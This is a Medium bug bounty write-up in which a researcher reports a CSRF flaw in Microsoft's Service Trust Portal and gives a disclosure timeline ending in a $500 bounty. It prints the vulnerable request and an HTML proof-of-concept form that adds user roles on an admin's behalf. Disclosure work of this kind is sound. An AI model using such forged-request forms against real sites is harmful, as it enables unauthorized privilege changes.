Microsoft CSRF Vulnerability

Adesh Kolte
Oct 12, 2018 · 2 min read

I am Adesh Nandkishor Kolte an Independent Security Resercher From India

and also working with SecureLayer7 as a Security Consultant

Talking about Microsoft bug bounty first point they only accept submission which is high impact. Big `NO` to low hanging fruits and big `NO` if you can not exploit the bug. I was testing one of Microsoft domain — Service Trust Portal (STP).
During the testing, I came across below feature in their portal where you can add Portal users and Portal admin. The Add User feature caught my attention, generally speaking while checking out the application I always try to correlate application work flow with respect to different attack vector which I can execute , so that time straight away I though about CSRF.

Vulnerable URL:

https://trustportal.office.com/onboarding/AddUserRole

POC:-

HTTP Request:-

GET /onboarding/AddUserRole/1110?role=User HTTP/1.1
Host: trustportal.office.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://trustportal.office.com/Onboarding/AddUserRole
Cookie: [Some_value]
Connection: keep-alive

From above HTTP Request we conclude that there is no CSRF token present.
This way by using this loophole I was able to Add User roles on behalf of admin user.

Exploitation:-

<html>
<body>
<form action=”https://trustportal.office.com/onboarding/AddUserRole/1110">
<input type=”hidden” name=”role” value=”User” />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>

So I was able to add any user in their Cloud Service Trust Portal by using CSRF Attack.

They listed me in their Hall Of Fame and Rewarded me with the bounty.

Aug 14, 2017 : Reported to Microsoft Security Response Center.
Aug 20, 2017 : Received initial reply from Microsoft Team. Report Triaged
Aug 25, 2017 : Microsoft Security Team successfully reproduced the bug.
Sep 16, 2017 : Microsoft Security Team Fixed the reported bug.
Oct 01, 2017 : Bounty Awarded of $500 by Microsoft
Disclosed……

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store